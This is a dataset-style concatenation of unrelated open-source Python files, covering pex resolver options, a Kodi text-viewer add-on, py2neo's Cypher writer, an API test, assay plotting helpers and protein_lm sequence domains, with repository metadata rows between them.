def get_crawler(self):
raise NotImplementedError
def get_sorter(self):
raise NotImplementedError
def get_translator(self, interpreter, platform):
raise NotImplementedError
def get_iterator(self):
raise NotImplementedError
class ResolverOptionsBuilder(object):
"""A helper that processes options into a ResolverOptions object.
Used by command-line and requirements.txt processors to configure a resolver.
"""
def __init__(self,
fetchers=None,
allow_all_external=False,
allow_external=None,
allow_unverified=None,
allow_prereleases=None,
precedence=None,
context=None):
self._fetchers = fetchers if fetchers is not None else [PyPIFetcher()]
self._allow_all_external = allow_all_external
self._allow_external = allow_external if allow_external is not None else set()
self._allow_unverified = allow_unverified if allow_unverified is not None else set()
self._allow_prereleases = allow_prereleases
self._precedence = precedence if precedence is not None else Sorter.DEFAULT_PACKAGE_PRECEDENCE
self._context = context or Context.get()
def clone(self):
return ResolverOptionsBuilder(
fetchers=self._fetchers[:],
allow_all_external=self._allow_all_external,
allow_external=self._allow_external.copy(),
allow_unverified=self._allow_unverified.copy(),
allow_prereleases=self._allow_prereleases,
precedence=self._precedence[:],
context=self._context,
)
def add_index(self, index):
fetcher = PyPIFetcher(index)
if fetcher not in self._fetchers:
self._fetchers.append(fetcher)
return self
def set_index(self, index):
self._fetchers = [PyPIFetcher(index)]
return self
def add_repository(self, repo):
fetcher = Fetcher([repo])
if fetcher not in self._fetchers:
self._fetchers.append(fetcher)
return self
def clear_indices(self):
self._fetchers = [fetcher for fetcher in self._fetchers if not isinstance(fetcher, PyPIFetcher)]
return self
def allow_all_external(self):
self._allow_all_external = True
return self
def allow_external(self, key):
self._allow_external.add(safe_name(key).lower())
return self
def allow_unverified(self, key):
self._allow_unverified.add(safe_name(key).lower())
return self
def use_wheel(self):
if WheelPackage not in self._precedence:
self._precedence = (WheelPackage,) + self._precedence
return self
def no_use_wheel(self):
self._precedence = tuple(
[precedent for precedent in self._precedence if precedent is not WheelPackage])
return self
def allow_builds(self):
if SourcePackage not in self._precedence:
self._precedence = self._precedence + (SourcePackage,)
return self
def no_allow_builds(self):
self._precedence = tuple(
[precedent for precedent in self._precedence if precedent is not SourcePackage])
return self
# TODO: Make this whole interface more Pythonic.
#
# This method would be better defined as a property allow_prereleases.
# Unfortunately, the existing method below already usurps the name allow_prereleases.
# It is an existing API that returns self as if it was written in an attempt to allow
# Java style chaining of method calls.
# Due to that return type, it cannot be used as a Python property setter.
# It's currently used in this manner:
#
# builder.allow_prereleases(True)
#
# and we cannot change it into @allow_prereleases.setter and use in this manner:
#
# builder.allow_prereleases = True
#
# without affecting the existing API calls.
#
# The code review shows that, for this particular method (allow_prereleases),
# the return value (self) is never used in the current API calls.
# It would be worth examining if the API change for this and some other methods here
# would be a good idea.
@property
def prereleases_allowed(self):
return self._allow_prereleases
def allow_prereleases(self, allowed):
self._allow_prereleases = allowed
return self
def build(self, key):
return ResolverOptions(
fetchers=self._fetchers,
allow_external=self._allow_all_external or key in self._allow_external,
allow_unverified=key in self._allow_unverified,
allow_prereleases=self._allow_prereleases,
precedence=self._precedence,
context=self._context,
)
class ResolverOptions(ResolverOptionsInterface):
def __init__(self,
fetchers=None,
allow_external=False,
allow_unverified=False,
allow_prereleases=None,
precedence=None,
context=None):
self._fetchers = fetchers if fetchers is not None else [PyPIFetcher()]
self._allow_external = allow_external
self._allow_unverified = allow_unverified
self._allow_prereleases = allow_prereleases
self._precedence = precedence if precedence is not None else Sorter.DEFAULT_PACKAGE_PRECEDENCE
self._context = context or Context.get()
# TODO(wickman) Revisit with Github #58
def get_context(self):
return self._context
def get_crawler(self):
return Crawler(self.get_context())
# get_sorter and get_translator are arguably options that should be global
# except that --no-use-wheel breaks that assumption.
def get_sorter(self):
return Sorter(self._precedence)
def get_translator(self, interpreter, platform):
translators = []
# TODO(wickman) This is not ideal -- consider an explicit link between a Package
# and its Installer type rather than mapping this here, precluding the ability to
# easily add new package types (or we just forego that forever.)
for package in self._precedence:
if package is WheelPackage:
translators.append(WheelTranslator(interpreter=interpreter, platform=platform))
elif package is EggPackage:
translators.append(EggTranslator(interpreter=interpreter, platform=platform))
elif package is SourcePackage:
installer_impl = WheelInstaller if WheelPackage in self._precedence else EggInstaller
translators.append(SourceTranslator(
installer_impl=installer_impl,
interpreter=interpreter,
platform=platform))
return ChainedTranslator(*translators)
def get_iterator(self):
return Iterator(
fetchers=self._fetchers,
crawler=self.get_crawler(),
follow_links=self._allow_external,
allow_prereleases=self._allow_prereleases
)
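# Illustrative only: the chaining style the builder supports. The index URL and
# requirement key are made-up values, not pex defaults.
#
# builder = ResolverOptionsBuilder()
# builder.set_index('https://pypi.example.org/simple/').no_use_wheel()
# builder.allow_prereleases(True)  # returns self, so chaining works here too
# options = builder.build('requests')
# iterator = options.get_iterator()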
|
apache-2.0
| 5,057,392,927,551,107,000
| 33.201878
| 100
| 0.699657
| false
| 4.20612
| false
| false
| false
|
XBMC-Addons/service.xbmc.versioncheck
|
resources/lib/version_check/viewer.py
|
1
|
5158
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (C) 2011-2013 Martijn Kaijser
Copyright (C) 2013-2014 Team-XBMC
Copyright (C) 2014-2019 Team Kodi
This file is part of service.xbmc.versioncheck
SPDX-License-Identifier: GPL-3.0-or-later
See LICENSES/GPL-3.0-or-later.txt for more information.
"""
from contextlib import closing
import os
import sys
import xbmc # pylint: disable=import-error
import xbmcaddon # pylint: disable=import-error
import xbmcgui # pylint: disable=import-error
import xbmcvfs # pylint: disable=import-error
_ADDON = xbmcaddon.Addon('service.xbmc.versioncheck')
_ADDON_NAME = _ADDON.getAddonInfo('name')
if sys.version_info[0] >= 3:
_ADDON_PATH = _ADDON.getAddonInfo('path')
else:
_ADDON_PATH = _ADDON.getAddonInfo('path').decode('utf-8')
_ICON = _ADDON.getAddonInfo('icon')
class Viewer:
""" Show user a text viewer (WINDOW_DIALOG_TEXT_VIEWER)
Include the text file for the viewer's body in the resources/ directory
usage:
script_path = os.path.join(_ADDON_PATH, 'resources', 'lib', 'version_check', 'viewer.py')
xbmc.executebuiltin('RunScript(%s,%s,%s)' % (script_path, 'Heading', 'notice.txt'))
:param heading: text viewer heading
:type heading: str
:param filename: filename to use for the text viewer's body
:type filename: str
"""
WINDOW = 10147
CONTROL_LABEL = 1
CONTROL_TEXTBOX = 5
def __init__(self, heading, filename):
self.heading = heading
self.filename = filename
# activate the text viewer window
xbmc.executebuiltin('ActivateWindow(%d)' % (self.WINDOW,))
# get window
self.window = xbmcgui.Window(self.WINDOW)
# give window time to initialize
xbmc.sleep(100)
# set controls
self.set_controls()
def set_controls(self):
""" Set the window controls
"""
# get text viewer body text
text = self.get_text()
# set heading
self.window.getControl(self.CONTROL_LABEL).setLabel('%s : %s' % (_ADDON_NAME,
self.heading,))
# set text
self.window.getControl(self.CONTROL_TEXTBOX).setText(text)
xbmc.sleep(2000)
def get_text(self):
""" Get the text viewers body text from self.filename
:return: contents of self.filename
:rtype: str
"""
try:
return self.read_file(self.filename)
except Exception as error: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(error), xbmc.LOGERROR)
return ''
@staticmethod
def read_file(filename):
""" Read the contents of the provided file, from
os.path.join(_ADDON_PATH, 'resources', filename)
:param filename: name of file to read
:type filename: str
:return: contents of the provided file
:rtype: str
"""
filename = os.path.join(_ADDON_PATH, 'resources', filename)
with closing(xbmcvfs.File(filename)) as open_file:
contents = open_file.read()
return contents
class WebBrowser:
""" Display url using the default browser
usage:
script_path = os.path.join(_ADDON_PATH, 'resources', 'lib', 'version_check', 'viewer.py')
xbmc.executebuiltin('RunScript(%s,%s,%s)' % (script_path, 'webbrowser', 'https://kodi.tv/'))
:param url: url to open
:type url: str
"""
def __init__(self, url):
self.url = url
try:
# notify user
self.notification(_ADDON_NAME, self.url)
xbmc.sleep(100)
# launch url
self.launch_url()
except Exception as error: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(error), xbmc.LOGERROR)
@staticmethod
def notification(heading, message, icon=None, time=15000, sound=True):
""" Create a notification
:param heading: notification heading
:type heading: str
:param message: notification message
:type message: str
:param icon: path and filename for the notification icon
:type icon: str
:param time: time to display notification
:type time: int
:param sound: is notification audible
:type sound: bool
"""
if not icon:
icon = _ICON
xbmcgui.Dialog().notification(heading, message, icon, time, sound)
def launch_url(self):
""" Open self.url in the default web browser
"""
import webbrowser # pylint: disable=import-outside-toplevel
webbrowser.open(self.url)
if __name__ == '__main__':
try:
if sys.argv[1] == 'webbrowser':
WebBrowser(sys.argv[2])
else:
Viewer(sys.argv[1], sys.argv[2])
except Exception as err: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(err), xbmc.LOGERROR)
|
gpl-2.0
| 6,787,627,537,322,967,000
| 30.440252
| 100
| 0.582784
| false
| 3.928408
| false
| false
| false
|
nigelsmall/py2neo
|
py2neo/database/cypher.py
|
1
|
6889
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2016, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import StringIO
from json import dumps as json_dumps
from sys import stdout
from py2neo.compat import ustr
from py2neo.types import Node, Relationship, Path
from py2neo.util import is_collection
class CypherWriter(object):
""" Writer for Cypher data. This can be used to write to any
file-like object, such as standard output.
"""
safe_first_chars = u"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"
safe_chars = u"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"
default_sequence_separator = u","
default_key_value_separator = u":"
def __init__(self, file=None, **kwargs):
self.file = file or stdout
self.sequence_separator = kwargs.get("sequence_separator", self.default_sequence_separator)
self.key_value_separator = \
kwargs.get("key_value_separator", self.default_key_value_separator)
def write(self, obj):
""" Write any entity, value or collection.
:arg obj:
"""
if obj is None:
pass
elif isinstance(obj, Node):
self.write_node(obj)
elif isinstance(obj, Relationship):
self.write_relationship(obj)
elif isinstance(obj, Path):
self.write_walkable(obj)
elif isinstance(obj, dict):
self.write_map(obj)
elif is_collection(obj):
self.write_list(obj)
else:
self.write_value(obj)
def write_value(self, value):
""" Write a value.
:arg value:
"""
self.file.write(ustr(json_dumps(value, ensure_ascii=False)))
def write_identifier(self, identifier):
""" Write an identifier.
:arg identifier:
"""
if not identifier:
raise ValueError("Invalid identifier")
identifier = ustr(identifier)
safe = (identifier[0] in self.safe_first_chars and
all(ch in self.safe_chars for ch in identifier[1:]))
if not safe:
self.file.write(u"`")
self.file.write(identifier.replace(u"`", u"``"))
self.file.write(u"`")
else:
self.file.write(identifier)
def write_list(self, collection):
""" Write a list.
:arg collection:
"""
self.file.write(u"[")
link = u""
for value in collection:
self.file.write(link)
self.write(value)
link = self.sequence_separator
self.file.write(u"]")
def write_literal(self, text):
""" Write literal text.
:arg text:
"""
self.file.write(ustr(text))
def write_map(self, mapping, private=False):
""" Write a map.
:arg mapping:
:arg private:
"""
self.file.write(u"{")
link = u""
for key, value in sorted(dict(mapping).items()):
if key.startswith("_") and not private:
continue
self.file.write(link)
self.write_identifier(key)
self.file.write(self.key_value_separator)
self.write(value)
link = self.sequence_separator
self.file.write(u"}")
def write_node(self, node, name=None, full=True):
""" Write a node.
:arg node:
:arg name:
:arg full:
"""
self.file.write(u"(")
if name is None:
name = node.__name__
self.write_identifier(name)
if full:
for label in sorted(node.labels()):
self.write_literal(u":")
self.write_identifier(label)
if node:
self.file.write(u" ")
self.write_map(dict(node))
self.file.write(u")")
def write_relationship(self, relationship, name=None):
""" Write a relationship (including nodes).
:arg relationship:
:arg name:
"""
self.write_node(relationship.start_node(), full=False)
self.file.write(u"-")
self.write_relationship_detail(relationship, name)
self.file.write(u"->")
self.write_node(relationship.end_node(), full=False)
def write_relationship_detail(self, relationship, name=None):
""" Write a relationship (excluding nodes).
:arg relationship:
:arg name:
"""
self.file.write(u"[")
if name is not None:
self.write_identifier(name)
if relationship.type():
self.file.write(u":")
self.write_identifier(relationship.type())
if relationship:
self.file.write(u" ")
self.write_map(relationship)
self.file.write(u"]")
def write_subgraph(self, subgraph):
""" Write a subgraph.
:arg subgraph:
"""
self.write_literal("({")
for i, node in enumerate(subgraph.nodes()):
if i > 0:
self.write_literal(", ")
self.write_node(node)
self.write_literal("}, {")
for i, relationship in enumerate(subgraph.relationships()):
if i > 0:
self.write_literal(", ")
self.write_relationship(relationship)
self.write_literal("})")
def write_walkable(self, walkable):
""" Write a walkable.
:arg walkable:
"""
nodes = walkable.nodes()
for i, relationship in enumerate(walkable):
node = nodes[i]
self.write_node(node, full=False)
forward = relationship.start_node() == node
self.file.write(u"-" if forward else u"<-")
self.write_relationship_detail(relationship)
self.file.write(u"->" if forward else u"-")
self.write_node(nodes[-1], full=False)
def cypher_escape(identifier):
""" Escape a Cypher identifier in backticks.
::
>>> cypher_escape("this is a `label`")
'`this is a ``label```'
:arg identifier:
"""
s = StringIO()
writer = CypherWriter(s)
writer.write_identifier(identifier)
return s.getvalue()
def cypher_repr(obj):
""" Generate the Cypher representation of an object.
:arg obj:
"""
s = StringIO()
writer = CypherWriter(s)
writer.write(obj)
return s.getvalue()
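# Short usage sketch (illustrative; the auto-generated identifier may differ):
#
# >>> from py2neo.types import Node
# >>> print(cypher_repr(Node("Person", name="Alice")))
# (alice:Person {name:"Alice"})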
|
apache-2.0
| 8,277,273,479,301,094,000
| 28.566524
| 99
| 0.575555
| false
| 4.076331
| false
| false
| false
|
alex/changes
|
tests/changes/api/test_system_options.py
|
1
|
1427
|
from changes.config import db
from changes.models import SystemOption
from changes.testutils import APITestCase
class SystemOptionsListTest(APITestCase):
def test_simple(self):
path = '/api/0/systemoptions/'
resp = self.client.get(path)
assert resp.status_code == 200
data = self.unserialize(resp)
assert data['system.message'] == ''
db.session.add(SystemOption(
name='system.message',
value='hello',
))
db.session.commit()
resp = self.client.get(path)
assert resp.status_code == 200
data = self.unserialize(resp)
assert data['system.message'] == 'hello'
class SystemOptionsUpdateTest(APITestCase):
def test_simple(self):
path = '/api/0/systemoptions/'
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 401
self.login_default()
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 403
self.login_default_admin()
resp = self.client.post(path, data={
'system.message': 'hello',
})
assert resp.status_code == 200
options = dict(db.session.query(
SystemOption.name, SystemOption.value
))
assert options.get('system.message') == 'hello'
|
apache-2.0
| -5,700,007,956,722,778,000
| 25.425926
| 55
| 0.58164
| false
| 4.077143
| true
| false
| false
|
chiffa/Pharmacosensitivity_growth_assays
|
src/plot_drawings.py
|
1
|
5857
|
import numpy as np
from matplotlib import pyplot as plt
from chiffatools.linalg_routines import rm_nans
from chiffatools.dataviz import better2D_desisty_plot
import supporting_functions as SF
from scipy import stats
def quick_hist(data):
plt.hist(np.log10(rm_nans(data)), bins=20)
plt.show()
def show_2d_array(data):
plt.imshow(data, interpolation='nearest', cmap='coolwarm')
plt.colorbar()
plt.show()
def correlation_plot(x, y):
plt.plot(x, y, '.k')
plt.show()
better2D_desisty_plot(x, y)
plt.show()
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
print "r-squared:", r_value**2
def raw_plot(values, full_values, concentrations, noise_level, color):
m_i = values.shape[0]
m_j = values.shape[2]
ax = plt.subplot(111)
ax.set_xscale('log')
msk = concentrations == 0.0
concentrations[msk] = np.min(concentrations[np.logical_not(msk)])/4
if type(noise_level) == np.float64 or type(noise_level) == float:
errs = np.empty_like(values)
errs.fill(noise_level)
errs = [errs, errs]
if type(noise_level) == np.ndarray:
errs = [noise_level, noise_level]
if type(noise_level) == tuple:
errs = [noise_level[0], noise_level[1]]
for i in range(0, m_i):
for j in range(0, m_j):
# temp_concs = concentrations
temp_concs = concentrations*np.random.uniform(0.95, 1.05, 1)
nan_mask = np.logical_not(np.isnan(full_values[i, :, j]))
plt.errorbar(temp_concs[nan_mask], full_values[i, nan_mask, j],
yerr=[errs[0][i, nan_mask, j], errs[1][i, nan_mask, j]], fmt='.', color=color, alpha=0.25)
plt.errorbar(temp_concs[nan_mask], values[i, nan_mask, j],
yerr=[errs[0][i, nan_mask, j], errs[1][i, nan_mask, j]], fmt='.', color=color)
def summary_plot(means, mean_err, concentrations, anchor, color='black', legend='', nofill=False):
# TODO: inject nan to mark that the control is different from the main sequence.
ax = plt.subplot(111)
ax.set_xscale('log')
nanmask = np.logical_not(np.isnan(means))
if not np.all(np.logical_not(nanmask)):
concentrations[0] = anchor
plt.errorbar(concentrations[nanmask], means[nanmask], yerr=mean_err[nanmask], color=color, label=legend)
ymax = means[nanmask] + mean_err[nanmask]
ymin = means[nanmask] - mean_err[nanmask]
if not nofill:
plt.fill_between(concentrations[nanmask], ymax, ymin, facecolor=color, alpha=0.25)
def vector_summary_plot(means_array, error_array, concentrations_array, anchor, legend_array=None, color='black'):
if legend_array is None:
legend_array = np.zeros_like(means_array[:, 0])
for i in range(0, means_array.shape[0]):
nanmask = np.logical_not(np.isnan(means_array[i, :]))
if not np.all(np.logical_not(nanmask)):
summary_plot(means_array[i, nanmask], error_array[i, nanmask], concentrations_array[i, nanmask], anchor, color, legend_array[i])
def pretty_gradual_plot(data, concentrations, strain_name_map, drug_name, blank_line=200):
def inner_scatter_plot(mean, std, relative, limiter=4):
series = np.zeros(mean.shape)
cell_type = np.zeros(mean.shape)
for i, name in enumerate(names):
series[i, :] = np.arange(i, c.shape[0]*(len(names)+40)+i, len(names)+40)
cell_type[i, :] = i
plt.scatter(series[i, :], mean[i, :], c=cm(i/float(len(names))), s=35, label=name)
plt.errorbar(series.flatten(), mean.flatten(), yerr=std.flatten(), fmt=None, capsize=0)
plt.xticks(np.mean(series, axis=0), c)
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=len(names)/limiter, mode="expand", borderaxespad=0.,prop={'size':6})
if not relative:
plt.axhline(y=blank_line)
plt.show()
filter = np.all(np.logical_not(np.isnan(data)), axis=(1, 2))
names = [strain_name_map[i] for i in filter.nonzero()[0].tolist()]
c = concentrations[filter, :][0, :]
mean = np.nanmean(data[filter, :, :], axis=-1)
std = np.nanstd(data[filter, :, :], axis=-1)
cm = plt.cm.get_cmap('spectral')
refmean = mean[:, 0].reshape((mean.shape[0], 1))
refstd = std[:, 0].reshape((mean.shape[0], 1))
rel_mean, rel_std = (mean/refmean, np.sqrt(np.power(refstd, 2)+np.power(std, 2))/mean)
inner_scatter_plot(mean, std, False)
inner_scatter_plot(rel_mean, rel_std, True)
mean_mean = np.nanmean(mean, axis=0)
std_mean = np.nanstd(mean, axis=0)
mean_std = np.nanmean(std, axis=0)
total_std = np.sqrt(np.power(std_mean, 2) + np.power(mean_std, 2))
confusables = np.sum(mean - std < blank_line, axis=0) / float(len(names))
rel_mean_mean = np.nanmean(rel_mean, axis=0)
rel_std_mean = np.nanstd(rel_mean, axis=0)
rel_mean_std = np.nanmean(rel_std, axis=0)
rel_total_std = np.sqrt(np.power(rel_std_mean, 2) + np.power(rel_mean_std, 2))
plt.subplot(212)
plt.plot(mean_mean, c=cm(0.00), label='mean of mean')
plt.plot(mean_std, c=cm(.25), label='mean of std')
plt.plot(std_mean, c=cm(.50), label='std of mean')
plt.plot(total_std, c=cm(0.75), label='total std')
# plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, mode="expand", borderaxespad=0.,prop={'size':8})
plt.axhline(y=blank_line)
plt.subplot(211)
plt.plot(rel_mean_mean, c=cm(0.00), label='mean of mean')
plt.plot(rel_mean_std, c=cm(.25), label='mean of std')
plt.plot(rel_std_mean, c=cm(.50), label='std of mean')
plt.plot(rel_total_std, c=cm(0.75), label='total std')
plt.plot(confusables, c=cm(0.9), label='confusable with null')
plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, mode="expand", borderaxespad=0., prop={'size': 8})
plt.show()
|
bsd-3-clause
| -7,508,849,187,087,418,000
| 38.85034
| 140
| 0.621137
| false
| 2.86126
| false
| false
| false
|
google-research/google-research
|
protein_lm/domains.py
|
1
|
14044
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Specifications for different types of input/output domains."""
import abc
import collections
import collections.abc
import gin
import numpy as np
import six
from six.moves import range
from protein_lm import seq_utils
from protein_lm import utils
BOS_TOKEN = '<' # Beginning of sequence token.
EOS_TOKEN = '>' # End of sequence token.
PAD_TOKEN = '_' # Padding token.
MASK_TOKEN = '*' # Mask token.
SEP_TOKEN = '|' # A special token for separating tokens for serialization.
@gin.configurable
class Vocabulary(object):
"""Basic vocabulary used to represent output tokens for domains."""
def __init__(self,
tokens,
include_bos=False,
include_eos=False,
include_pad=False,
include_mask=False,
bos_token=BOS_TOKEN,
eos_token=EOS_TOKEN,
pad_token=PAD_TOKEN,
mask_token=MASK_TOKEN):
"""A token vocabulary.
Args:
tokens: A list of tokens to put in the vocab. If an int, will be
interpreted as the number of tokens and '0', ..., 'tokens-1' will be
used as tokens.
include_bos: Whether to append `bos_token` to `tokens` that marks the
beginning of a sequence.
include_eos: Whether to append `eos_token` to `tokens` that marks the
end of a sequence.
include_pad: Whether to append `pad_token` to `tokens` to marks past end
of sequence.
include_mask: Whether to append `mask_token` to `tokens` to mark masked
positions.
bos_token: A special token that marks the beginning of sequence.
Ignored if `include_bos == False`.
eos_token: A special token that marks the end of sequence.
Ignored if `include_eos == False`.
pad_token: A special token that marks past the end of sequence.
Ignored if `include_pad == False`.
mask_token: A special token that marks MASKED positions for e.g. BERT.
Ignored if `include_mask == False`.
"""
if not isinstance(tokens, collections.abc.Iterable):
tokens = range(tokens)
tokens = [str(token) for token in tokens]
if include_bos:
tokens.append(bos_token)
if include_eos:
tokens.append(eos_token)
if include_pad:
tokens.append(pad_token)
if include_mask:
tokens.append(mask_token)
if len(set(tokens)) != len(tokens):
raise ValueError('tokens not unique!')
special_tokens = sorted(set(tokens) & set([SEP_TOKEN]))
if special_tokens:
raise ValueError(
f'tokens contains reserved special tokens: {special_tokens}!')
self._tokens = tokens
self._token_ids = list(range(len(self._tokens)))
self._id_to_token = collections.OrderedDict(
zip(self._token_ids, self._tokens))
self._token_to_id = collections.OrderedDict(
zip(self._tokens, self._token_ids))
self._bos_token = bos_token if include_bos else None
self._eos_token = eos_token if include_eos else None
self._mask_token = mask_token if include_mask else None
self._pad_token = pad_token if include_pad else None
def __len__(self):
return len(self._tokens)
@property
def tokens(self):
"""Return the tokens of the vocabulary."""
return list(self._tokens)
@property
def token_ids(self):
"""Return the tokens ids of the vocabulary."""
return list(self._token_ids)
@property
def bos(self):
"""Returns the index of the BOS token or None if unspecified."""
return (None if self._bos_token is None else
self._token_to_id[self._bos_token])
@property
def eos(self):
"""Returns the index of the EOS token or None if unspecified."""
return (None if self._eos_token is None else
self._token_to_id[self._eos_token])
@property
def mask(self):
"""Returns the index of the MASK token or None if unspecified."""
return (None if self._mask_token is None else
self._token_to_id[self._mask_token])
@property
def pad(self):
"""Returns the index of the PAD token or None if unspecified."""
return (None
if self._pad_token is None else self._token_to_id[self._pad_token])
def is_valid(self, value):
"""Tests if a value is a valid token id and returns a bool."""
return value in self._token_ids
def are_valid(self, values):
"""Tests if values are valid token ids and returns an array of bools."""
return np.array([self.is_valid(value) for value in values])
def encode(self, tokens):
"""Maps an iterable of string tokens to a list of integer token ids."""
if six.PY3 and isinstance(tokens, bytes):
# Always use Unicode in Python 3.
tokens = tokens.decode('utf-8')
return [self._token_to_id[token] for token in tokens]
def decode(self, values, stop_at_eos=False, as_str=True):
"""Maps an iterable of integer token ids to string tokens.
Args:
values: An iterable of token ids.
stop_at_eos: Whether to ignore all values after the first EOS token id.
as_str: Whether to return a list of tokens or a concatenated string.
Returns:
A string of tokens or a list of tokens if `as_str == False`.
"""
if stop_at_eos and self.eos is None:
raise ValueError('EOS unspecified!')
tokens = []
for value in values:
value = int(value) # Required if value is a scalar tensor.
if stop_at_eos and value == self.eos:
break
tokens.append(self._id_to_token[value])
return ''.join(tokens) if as_str else tokens
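# Illustrative sketch of round-tripping tokens through a Vocabulary; the
# 'A'/'B'/'C' token set below is an arbitrary example, not part of the API.
def _vocabulary_example():
  vocab = Vocabulary(tokens=['A', 'B', 'C'], include_eos=True)
  ids = vocab.encode('ABC')  # [0, 1, 2]
  text = vocab.decode(ids + [vocab.eos], stop_at_eos=True)  # 'ABC'
  return ids, text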
@gin.configurable
class ProteinVocab(Vocabulary):
"""A `Vocabulary` with amino acid tokens."""
def __init__(self,
include_anomalous_amino_acids=False,
include_align_tokens=False,
**kwargs):
"""Creates an instance of this class.
Args:
include_anomalous_amino_acids: A bool indicating whether to also include
the set of anomalous amino acids (vs. to use the standard ones only).
include_align_tokens: A bool indicating whether to also include the tokens
required to represent (fixed-length) aligned sequences.
**kwargs: Named parameters to be passed to the base class.
"""
tokens = list(seq_utils.AA_TOKENS)
if include_anomalous_amino_acids:
tokens += list(seq_utils.AA_ANOMALOUS_TOKENS)
if include_align_tokens:
tokens += list(seq_utils.AA_ALIGN_TOKENS)
super(ProteinVocab, self).__init__(tokens=tokens, **kwargs)
@six.add_metaclass(abc.ABCMeta)
class Domain(object):
"""Base class of problem domains, which specifies the set of valid objects."""
@property
def mask_fn(self):
"""Returns a masking function or None."""
@abc.abstractmethod
def is_valid(self, sample):
"""Tests if the given sample is valid for this domain."""
def are_valid(self, samples):
"""Tests if the given samples are valid for this domain."""
return np.array([self.is_valid(sample) for sample in samples])
class DiscreteDomain(Domain):
"""Base class for discrete domains: sequences of categorical variables."""
def __init__(self, vocab):
self._vocab = vocab
@property
def vocab_size(self):
return len(self.vocab)
@property
def vocab(self):
return self._vocab
def encode(self, samples, **kwargs):
"""Maps a list of string tokens to a list of lists of integer token ids."""
return [self.vocab.encode(sample, **kwargs) for sample in samples]
def decode(self, samples, **kwargs):
"""Maps list of lists of integer token ids to list of strings."""
return [self.vocab.decode(sample, **kwargs) for sample in samples]
@gin.configurable
class FixedLengthDiscreteDomain(DiscreteDomain):
"""Output is a fixed length discrete sequence."""
def __init__(self, vocab_size=None, length=None, vocab=None):
"""Creates an instance of this class.
Args:
vocab_size: An optional integer for constructing a vocab of this size.
If provided, `vocab` must be `None`.
length: The length of the domain (required).
vocab: The `Vocabulary` of the domain. If provided, `vocab_size` must be
`None`.
Raises:
ValueError: If neither `vocab_size` nor `vocab` is provided.
ValueError: If `length` is not provided.
"""
if length is None:
raise ValueError('length must be provided!')
if not (vocab_size is None) ^ (vocab is None):
raise ValueError('Exactly one of vocab_size or vocab must be specified!')
self._length = length
if vocab is None:
vocab = Vocabulary(vocab_size)
super(FixedLengthDiscreteDomain, self).__init__(vocab)
@property
def length(self):
return self._length
@property
def size(self):
"""The number of structures in the Domain."""
return self.vocab_size**self.length
def is_valid(self, sequence):
return len(sequence) == self.length and self.vocab.are_valid(sequence).all()
def sample_uniformly(self, num_samples, seed=None):
random_state = utils.get_random_state(seed)
return np.int32(
random_state.randint(
size=[num_samples, self.length], low=0, high=self.vocab_size))
def index_to_structure(self, index):
"""Given an integer and target length, encode into structure."""
structure = np.zeros(self.length, dtype=np.int32)
tokens = [int(token, base=len(self.vocab))
for token in np.base_repr(index, base=len(self.vocab))]
structure[-len(tokens):] = tokens
return structure
def structure_to_index(self, structure):
"""Returns the index of a sequence over a vocabulary of size `vocab_size`."""
structure = np.asarray(structure)[::-1]
return np.sum(structure * np.power(len(self.vocab), range(len(structure))))
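# Illustrative sketch: index_to_structure and structure_to_index realize a
# base-`vocab_size` positional encoding and invert each other. With
# vocab_size=2 and length=3, index 5 maps to the binary digits [1, 0, 1]:
def _index_roundtrip_example():
  domain = FixedLengthDiscreteDomain(vocab_size=2, length=3)
  structure = domain.index_to_structure(5)  # array([1, 0, 1])
  index = domain.structure_to_index(structure)  # 5
  return structure, index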
@gin.configurable
class VariableLengthDiscreteDomain(FixedLengthDiscreteDomain):
"""A domain for variable-length sequences."""
def __init__(self, vocab, length, min_length=0):
"""Creates an instance of this class.
Args:
vocab: An instance of a `Vocabulary` with an EOS token.
length: The maximum sequence length.
min_length: The minimum sequence length.
Raises:
ValueError: If `vocab` does not have an EOS token.
"""
if vocab.eos is None:
raise ValueError('vocab must have an EOS token!')
super(VariableLengthDiscreteDomain, self).__init__(
length=length, vocab=vocab)
self._min_length = min_length
@property
def length(self):
return self._length
@property
def min_length(self):
return self._min_length
def is_valid(self, sequence):
"""Tests if `sequences` are valid for this domain."""
unpadded_seq = seq_utils.unpad_sequences([sequence], self.vocab.eos)[0]
return (len(unpadded_seq) >= self.min_length and
len(unpadded_seq) <= self.length and
self.vocab.are_valid(sequence).all() and
seq_utils.sequences_end_with_value([sequence], self.vocab.eos)[0])
def encode(self, sequences, pad=True):
"""Integer-encodes sequences and optionally pads them."""
encoded = [self.vocab.encode(seq) for seq in sequences]
if pad:
encoded = seq_utils.pad_sequences(encoded, self.length, self.vocab.eos)
return encoded
def decode(self, sequences, stop_at_eos=True, **kwargs):
"""Integer-encodes sequences and optionally pads them."""
return [self.vocab.decode(seq, stop_at_eos=stop_at_eos, **kwargs)
for seq in sequences]
def sample_uniformly(self,
